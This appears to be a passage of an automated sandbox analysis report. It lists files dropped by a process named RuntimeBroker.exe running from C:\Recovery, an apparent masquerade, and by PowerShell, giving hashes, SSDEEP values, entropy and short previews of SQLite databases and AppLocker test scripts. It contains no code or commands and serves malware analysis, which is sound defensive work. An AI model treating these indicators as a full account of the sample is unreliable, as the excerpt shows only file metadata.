                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
